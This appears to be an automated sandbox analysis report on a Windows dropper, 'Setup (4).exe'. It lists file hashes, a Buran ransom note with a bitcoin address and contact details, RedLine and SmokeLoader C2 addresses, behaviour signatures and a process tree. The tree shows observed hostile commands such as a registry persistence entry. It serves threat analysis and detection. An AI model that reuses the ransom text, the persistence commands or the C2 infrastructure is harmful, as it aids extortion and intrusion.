Resubmissions
11-03-2024 21:22
240311-z8dsssgg58 1001-09-2021 13:18
210901-5bmxjspa5s 1001-09-2021 13:04
210901-te4btfspqa 1001-09-2021 05:12
210901-4wnkwm1p3j 1031-08-2021 21:47
210831-41rp97dma2 1031-08-2021 19:51
210831-359awwatje 1029-08-2021 11:37
210829-18htk4slyj 1028-08-2021 23:10
210828-rt8b9gzxn6 1028-08-2021 22:59
210828-zxgnh5j4w6 1028-08-2021 11:31
210828-xrjs66aknj 10Analysis
-
max time kernel
700s -
max time network
1808s -
platform
windows11_x64 -
resource
win11 -
submitted
22-08-2021 21:19
General
-
Target
Setup (4).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Score
10/10
Malware Config
Extracted
Path
C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
Family
buran
Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!!
All your files, documents, photos, databases and other important files are encrypted.
You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.
Only we can give you this key and only we can recover your files.
PAY FAST 590$=0.013 btc
or the price will increase tomorrow
bitcoin address
bc1qqxnp9z0ff8x852dyflp5r9r6rzse8jl5hzmqz8
To be sure we have the decryptor and it works you can send an email: payfast290@mail2tor.com and decrypt one file for free.
But this file should be of not valuable!
Do you really want to restore your files?
payfast290@mail2tor.com
TELEGRAM @ payfast290
Your personal ID: EC0-121-36E
Attention!
* Do not rename encrypted files.
* Do not try to decrypt your data using third party software, it may cause permanent data loss.
* Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
Extracted
Family
redline
Botnet
v1
C2
195.2.78.163:25450
Extracted
Family
redline
Botnet
dibild2
C2
135.148.139.222:1494
Extracted
Family
redline
Botnet
Ayrelia1_installs
C2
77.83.175.169:11490
Extracted
Family
smokeloader
Version
2020
C2
http://readinglistforaugust1.xyz/
http://readinglistforaugust2.xyz/
http://readinglistforaugust3.xyz/
http://readinglistforaugust4.xyz/
http://readinglistforaugust5.xyz/
http://readinglistforaugust6.xyz/
http://readinglistforaugust7.xyz/
http://readinglistforaugust8.xyz/
http://readinglistforaugust9.xyz/
http://readinglistforaugust10.xyz/
http://readinglistforaugust1.site/
http://readinglistforaugust2.site/
http://readinglistforaugust3.site/
http://readinglistforaugust4.site/
http://readinglistforaugust5.site/
http://readinglistforaugust6.site/
http://readinglistforaugust7.site/
http://readinglistforaugust8.site/
http://readinglistforaugust9.site/
http://readinglistforaugust10.site/
rc4.i32
rc4.i32
Signatures
-
Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 8 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 8 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Suspicious use of NtCreateProcessExOtherParentProcess 39 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
-
Turns off Windows Defender SpyNet reporting 2 TTPs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Windows security bypass 2 TTPs
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
-
Blocklisted process makes network request 24 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 4 IoCs
-
Executes dropped EXE 64 IoCs
-
Checks BIOS information in registry 2 TTPs 34 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Drops startup file 1 IoCs
-
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 9 IoCs
Detects Themida, an advanced Windows software protection system.
-
Windows security modification 2 TTPs 10 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 16 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 16 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 14 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 16 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 28 IoCs
-
Suspicious use of SetThreadContext 10 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 34 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 31 IoCs
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 59 IoCs
-
Kills process with taskkill 2 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 12 IoCs
-
Modifies system certificate store 2 TTPs 18 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 8 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious behavior: MapViewOfSection 62 IoCs
-
Suspicious behavior: SetClipboardViewer 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup (4).exe"C:\Users\Admin\AppData\Local\Temp\Setup (4).exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\JbKiwXXnIVKrDe7JmOAFS9Sn.exe"C:\Users\Admin\Documents\JbKiwXXnIVKrDe7JmOAFS9Sn.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\JbKiwXXnIVKrDe7JmOAFS9Sn.exe"C:\Users\Admin\Documents\JbKiwXXnIVKrDe7JmOAFS9Sn.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\GoTy9_iOul6GJXswRBxj0Gb2.exe"C:\Users\Admin\Documents\GoTy9_iOul6GJXswRBxj0Gb2.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\fpagZPTzHBKRNJmREvUFomCD.exe"C:\Users\Admin\Documents\fpagZPTzHBKRNJmREvUFomCD.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\4CIOoi9_uY6WDbOCPZE6vzJq.exe"C:\Users\Admin\Documents\4CIOoi9_uY6WDbOCPZE6vzJq.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2512 -s 2923⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\3Rv_QDzqwkxkTWo9EfJR1MPt.exe"C:\Users\Admin\Documents\3Rv_QDzqwkxkTWo9EfJR1MPt.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\1347818.exe"C:\Users\Admin\AppData\Roaming\1347818.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4936 -s 23724⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\5029889.exe"C:\Users\Admin\AppData\Roaming\5029889.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\3276427.exe"C:\Users\Admin\AppData\Roaming\3276427.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3240 -s 24164⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3240 -s 24164⤵
- Program crash
-
C:\Users\Admin\AppData\Roaming\8737749.exe"C:\Users\Admin\AppData\Roaming\8737749.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\whRhnsfQc1X0CirRHyUCHmt3.exe"C:\Users\Admin\Documents\whRhnsfQc1X0CirRHyUCHmt3.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\whRhnsfQc1X0CirRHyUCHmt3.exe"C:\Users\Admin\Documents\whRhnsfQc1X0CirRHyUCHmt3.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\rjHRSr6D2tW0qkCrnoRt1AhQ.exe"C:\Users\Admin\Documents\rjHRSr6D2tW0qkCrnoRt1AhQ.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\0JNvuRF83YIRAkQndblwhjq5.exe"C:\Users\Admin\Documents\0JNvuRF83YIRAkQndblwhjq5.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 3123⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\_FemgHz4Nhyj8W57Bksp2xEg.exe"C:\Users\Admin\Documents\_FemgHz4Nhyj8W57Bksp2xEg.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\4UDEgmXYadyoTvP6bI4AIvBN.exe"C:\Users\Admin\Documents\4UDEgmXYadyoTvP6bI4AIvBN.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\4UDEgmXYadyoTvP6bI4AIvBN.exeC:\Users\Admin\Documents\4UDEgmXYadyoTvP6bI4AIvBN.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\Hp5xNJbsUfDp0OovSVfWOaiq.exe"C:\Users\Admin\Documents\Hp5xNJbsUfDp0OovSVfWOaiq.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\Hp5xNJbsUfDp0OovSVfWOaiq.exeC:\Users\Admin\Documents\Hp5xNJbsUfDp0OovSVfWOaiq.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\Hp5xNJbsUfDp0OovSVfWOaiq.exeC:\Users\Admin\Documents\Hp5xNJbsUfDp0OovSVfWOaiq.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\bZ1PSBSM4SFNEjpsUaGfIwTB.exe"C:\Users\Admin\Documents\bZ1PSBSM4SFNEjpsUaGfIwTB.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\fwAfEuxyik8mZFbqDlQ_q9On.exe"C:\Users\Admin\Documents\fwAfEuxyik8mZFbqDlQ_q9On.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4180 -s 2563⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\m0hJbaVig6b8SFD60Pu32W_g.exe"C:\Users\Admin\Documents\m0hJbaVig6b8SFD60Pu32W_g.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\m0hJbaVig6b8SFD60Pu32W_g.exe"C:\Users\Admin\Documents\m0hJbaVig6b8SFD60Pu32W_g.exe" -q3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2240 -s 7164⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\5DRyqXDE6Jku4GFNl9LEELNj.exe"C:\Users\Admin\Documents\5DRyqXDE6Jku4GFNl9LEELNj.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\5EWujCtaHqJIGO0v2pCoPeES.exe"C:\Users\Admin\Documents\5EWujCtaHqJIGO0v2pCoPeES.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-NST0L.tmp\5EWujCtaHqJIGO0v2pCoPeES.tmp"C:\Users\Admin\AppData\Local\Temp\is-NST0L.tmp\5EWujCtaHqJIGO0v2pCoPeES.tmp" /SL5="$70206,138429,56832,C:\Users\Admin\Documents\5EWujCtaHqJIGO0v2pCoPeES.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-0MN33.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-0MN33.tmp\Setup.exe" /Verysilent4⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 2926⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629409785 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"6⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-26QJK.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-26QJK.tmp\Inlog.tmp" /SL5="$70170,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-BQGUL.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-BQGUL.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7217⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-MLU9H.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-MLU9H.tmp\Setup.tmp" /SL5="$602C2,17352168,721408,C:\Users\Admin\AppData\Local\Temp\is-BQGUL.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7218⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-1QTIA.tmp\{app}\microsoft.cab -F:* %ProgramData%9⤵
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-1QTIA.tmp\{app}\microsoft.cab -F:* C:\ProgramData10⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f9⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f10⤵
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"9⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-1QTIA.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-1QTIA.tmp\{app}\vdi_compiler"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5504 -s 26010⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7219⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=72110⤵
- Adds Run key to start application
- Enumerates system info in registry
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa0fa746f8,0x7ffa0fa74708,0x7ffa0fa7471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,8004022169020842499,12692913513309839860,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2236 /prefetch:211⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2216,8004022169020842499,12692913513309839860,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2216,8004022169020842499,12692913513309839860,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2600 /prefetch:811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,8004022169020842499,12692913513309839860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3160 /prefetch:111⤵
- Suspicious use of SetThreadContext
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,8004022169020842499,12692913513309839860,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,8004022169020842499,12692913513309839860,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,8004022169020842499,12692913513309839860,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4936 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,8004022169020842499,12692913513309839860,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2216,8004022169020842499,12692913513309839860,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4736 /prefetch:811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2216,8004022169020842499,12692913513309839860,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4736 /prefetch:811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2216,8004022169020842499,12692913513309839860,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3892 /prefetch:811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,8004022169020842499,12692913513309839860,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,8004022169020842499,12692913513309839860,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2832 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,8004022169020842499,12692913513309839860,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,8004022169020842499,12692913513309839860,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3664 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,8004022169020842499,12692913513309839860,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4112 /prefetch:211⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,8004022169020842499,12692913513309839860,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,8004022169020842499,12692913513309839860,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4224 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,8004022169020842499,12692913513309839860,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1652 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,8004022169020842499,12692913513309839860,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6256 /prefetch:111⤵
-
